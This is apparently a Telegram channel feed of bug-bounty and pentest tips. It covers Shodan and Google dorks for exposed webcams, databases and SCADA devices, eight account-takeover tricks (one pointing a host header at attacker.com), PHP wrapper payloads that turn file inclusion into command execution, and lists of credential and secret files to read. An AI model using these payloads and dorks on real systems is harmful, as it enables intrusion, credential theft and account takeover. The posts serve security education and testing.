GitBook
5.56K subscribers
268 photos
4 videos
390 files
866 links
ctf, pentest, writeUps, osint, labs,
tips، GitBooks, Notion
Web pentest, bug bounty
Download Telegram
Shodan Dorks for OSINT, Recon and Bug Bounty

📸 Exposed Webcams
Finds IP cams running webcamXP software

• Example: http.title:"webcamXP"

🧑‍💻 Open FTP Servers
Finds FTP servers that allow anonymous login

• Example (Anonymous login access):
port:21 anonymous

💻 Outdated Operation Systems
Like Finding devices that running Windows 7

• Example: os:"Windows 7"

🌐 Misconfigured MongoDB Databases
Finds exposed MongoDB instances without authentication

• Example: product:"MongoDB" port:27017

🔐 Exposed Login Panels
Identifies admin login portals

• Example: http.title:"Admin Login"

🧭 Specific Geolocation Targets
Finds services exposed in a specific country

• Example: port:22 country:"IN"

🧨 Apache Servers with Expired SSL in the US
Finds Apache web servers with expired SSL certs in the US

• Example: product:"Apache httpd" ssl:"expired" country:"US"

🧪 Devices Vulnerable to CVEs (e.g., Confluence CVE-2021–26084)
Finds potentially vulnerable Confluence servers

• Example: http.html:"Atlassian Confluence" port:8090

🎛 ICS/SCADA Devices
Detects Modbus protocol on industrial systems

• Example: port:502 name:"modbus"

Subdomain Enumeration with Favicon using Shodan:
Shodan Search Query Fundamentals:

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
1🔥1
Firing 8 Account Takeover Methods

🔴Unicode Normalization Issue
1. victim account: victim@gmail.com
2. create an account using Unicode | example: vićtim@gmail.com (here is ć is an Unicode character)
✍️ list of Unicode character: 🔗 Link
Note: check where verification doesn’t require


🔴Authorization Issue
1. change email of Account A and put email B
2. check confirmation mail in account B
3. open the confirmation mail from account C
Taken over Account C

🔴Reusing Reset Token
if target allows you to reuse the reset link then hunt for more reset link via gau ,wayback or urlscan.io

🔴Pre Account Takeover
1. signup using normal signup form as a hacker but hacker has no verification link.
2. then if victim signs up using oauth .
3. Verification bypass now attacker can login the victim account without verification link with the password he entered while registering.

🔴CORS Misconfiguration to Account Takeover
1. check api , any endpoint has access access token/session/secret/fingerprint
2. if yes check for CORS misconfiguration does it allow us to fetch data from target?
3. make a payload to fetch data and replace headers and boom

🔴CSRF to ATO
If profile modification in cookie based authentication doesn’t generate any token
1. open Account A change & Put email that you own click save intercept the request and generate a csrf poc.
2. if fully cookie based auth then you dont have to modify anything send the CSRF file to victim.
3. if it requires UUID/UserID or unique token it becomes hard to do that but that doesn't mean it is secure , just start playing with target
hint: password reset page helps many times for UUID/GUID and UserID

🔴Host Header Injection
well in this case there are 4 ways do that.
1. click reset password change host header.
2. or change proxy header ex: X-Forwarded-For: attacker.com
3. or change host, referrer, origin headers at once as attacker.com
4. click reset then click resend mail and do all 3 methods above

🔴Response Manipulation
1. code manipulation * to 200 OK
2. code and body manipulation
code * to 200 OK
body * to {"success":true} or {}
It works when json is being used to transfer and receive data.


#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #ATO
🔥2
🔥 Mastering PHP Filters & Wrappers for LFI to RCE — FULL GUIDE

⚠️Most hackers stop at reading logs.
The elite use PHP wrappers to turn LFI into remote code execution.
This post is your all-in-one breakdown of how PHP wrappers work and how to exploit them like a pro. 👇

🎯 Why PHP Wrappers Matter in Bug Bounty
PHP provides built-in stream wrappers — special protocols to access I/O sources like files, memory, input/output streams, and even compressed/encrypted data.


As attackers, we can abuse these wrappers to:
Read raw PHP source (even when .php is auto-appended)
Bypass execution to leak secrets
Chain into full RCE
Abuse legacy or misconfigured server behavior

Commonly used wrappers:
▶️ php://filter
▶️ php://input
▶️ php://memory
▶️ data://
▶️ expect://
▶️ zip://
▶️ phar://

🧬 Using php://filter for Source Code Disclosure
This is the most useful wrapper for LFI.

Payload:
php://filter/read=convert.base64-encode/resource=index


Why it works:
read=convert.base64-encode prevents execution of the PHP code
Base64 output = raw, readable source

Example:
http://<IP>/index.php?file=php://filter/read=convert.base64-encode/resource=config

Decode result:
echo 'PD9waHAK...base64...' | base64 -d

Now you see source code, credentials, internal logic, API keys, etc.

🔧 Other Useful PHP Wrappers

1️⃣ php://input

Reads raw POST data.
Good for injecting code during file inclusions via POST.
<?php include('php://input'); ?>

Then POST:
POST /index.php
<?php system($_GET['cmd']); ?>

Shell access via cmd parameter.

2️⃣ expect:// (if available)

Allows direct execution of system commands.
include('expect://ls');

⚠️ Rare but deadly if enabled.

3️⃣ data://

Inline file input using base64 or plaintext.

Example:
include('data://text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==');

🟡 Executes: system('whoami')

4️⃣ zip://

Targets ZIP files as file systems.
Abuse via LFI to include malicious entries.

Structure:
zip://path/to/archive.zip#file_inside.txt

Use this with file upload + LFI combo.

5️⃣ phar://

Deserializes metadata → use with Object Injection + LFI.

Upload malicious PHAR:
phar://path/to/phar_file

If unserialize() is called on a phar wrapper, it can lead to RCE.


🔍 Fuzzing PHP Files Before Exploiting
ffuf -w /opt/seclists/.../directory-list.txt -u http://<IP>/FUZZ.php


Watch for:

200 → exists and renders
403/302 → access denied, but still includable via LFI


📁 Standard Inclusion vs. Filtered Inclusion

Including via:
?file=config

🟡 Executes file, no output if file has no HTML.

Using filter:
?file=php://filter/read=convert.base64-encode/resource=config

🟡 Returns base64 source code.


🧪 Decode & Analyze the Source Code
echo 'base64-encoded-content' | base64 -d


Look for:
$db_password, $admin_pass
API endpoints
Sensitive routes
Hardcoded JWT secrets or keys


💣 Advanced Chaining → From LFI to RCE

Read source via php://filter
Find upload paths or SSRF endpoints
Upload malicious phar:// file
Trigger inclusion → RCE

This chain has been used in real-world bounty reports.

🧱 Defense Tips for Developers:
- Disable allow_url_include, allow_url_fopen
- Avoid dynamic include($_GET['page'])
- Use strict whitelists
- Harden php.ini configs
- Monitor suspicious access patterns


🧠 Daily hacking insights
🛠 Payloads & Tools
🐞 Real bug bounty techniques
⚔️ Hands-on exploitation walkthroughs

👍 Like this post if it helped
🔁 Share to boost your hacker circle

🔗 Github link : github.com/cybersecplayground...

#lfi #phpwrappers #bugbounty #phpfilters #rce #infosec #cybersecurity #webpentest #cybersecplayground
5🔥1
🚀 LFI - Interesting Linux files

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/plocate/plocate.db
/var/lib/mlocate.db

#bugbounty #bugbountytips #bugbountytip #hackerone #bugcrowd #infosec #cybersecurity #pentesting #redteam #informationsecurity #securitycipher #technology #coding #code #recon #ai #llm #owasp
1
Grep tips for Javascript Analysis

💡Note: cat * is for all files from the folder.


🟣Extracting JavaScript Files from recursive Directories
find /path/to/your/folders -name "*.js" -exec mv {} /path/to/target/folder/ \;


🟣Searching for API Keys and Secrets
cat * | grep -rE "apikey|api_key|secret|token|password|auth|key|pass|user"


🟣Detecting Dangerous Function Calls
cat * | grep -rE "eval|document\.write|innerHTML|setTimeout|setInterval|Function"


🟣Checking for URL Manipulation
cat * | grep -rE "location\.href|location\.replace|location\.assign|window\.open"


🟣Searching for Cross-Origin Requests
cat * | grep -rE "XMLHttpRequest|fetch|Access-Control-Allow-Origin|withCredentials" /path/to/js/files


🟣Analyzing postMessage Usage
cat * | grep -r "postMessage"


🟣Finding Hardcoded URLs or Endpoints
cat * | grep -rE "https?://|www\."


🟣Locating Debugging Information
cat * | grep -rE "console\.log|debugger|alert|console\.dir"


🟣Investigating User Input Handling
cat * | grep -rE "document\.getElementById|document\.getElementsByClassName|document\.querySelector|document\.forms"


#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #JS
3
A Comprehensive Repo for Shodan Dorks

This GitHub repository provides a range of Shodan dorks to find vulnerabilities and configuration issues in various types of devices such as webcams, routers, and servers.

• Repository: https://github.com/nullfuzz-pentest/shodan-dorks

#infosec #cybersecurity #bugbounty #pentest #bugbountyTips #shodan #recon #dork
1
🚀 Google Dorks for Bug Bounty & Web Security! 🔍

A powerful list of Google Dorks to uncover hidden files, API endpoints, server errors, and more for pentesting & bug bounty hunting! 🎯


🔥 Broad Domain Search (Exclude Common Subdomains)
site:example.com -www -shop -share -ir -mfa


🔥 PHP Files with Parameters
site:example.com ext:php inurl:?


🔥 API Endpoints Discovery
site:example[.]com inurl:api | site:*/rest | site:*/v1 | site:*/v2 | site:*/v3


🔥 Juicy Extensions (Sensitive Files)
site:"example[.]com" ext:log | ext:txt | ext:conf | ext:cnf | ext:ini | ext:env | ext:sh | ext:bak | ext:backup | ext:swp | ext:old | ext:~ | ext:git | ext:svn | ext:htpasswd | ext:htaccess | ext:json


🔥 High-Value InURL Keywords
inurl:conf | inurl:env | inurl:cgi | inurl:bin | inurl:etc | inurl:root | inurl:sql | inurl:backup | inurl:admin | inurl:php site:example[.]com


🔥 Finding Server Errors
inurl:"error" | intitle:"exception" | intitle:"failure" | intitle:"server at" | inurl:exception | "database error" | "SQL syntax" | "undefined index" | "unhandled exception" | "stack trace" site:example[.]com


💥 Master these dorks to find misconfigurations, sensitive data leaks, and security flaws!


📢 #BugBounty #GoogleDorks #OSINT #EthicalHacking #Pentesting #CyberSecurity
👍31
If you come across a WordPress website, fuzz for these files and patterns:

.env.bak
.env.php
wp-config-backup.php
wp-config.php.save
wp-config.php~
wp-config.php.old
error_log.log
php_error.log
wp.sql
db.sql
wpbackup.sql
mysql_backup.sql
{TARGET}.zip
{TARGET}-backup.zip


You can generate wordlists with the patterns above or any pattern you want using Fback:
https://github.com/Spix0r/Fback

#InfoSec #CyberSecurity #Hacking #Course #bugbounty #wordpress #Fuzzing
2👍1🔥1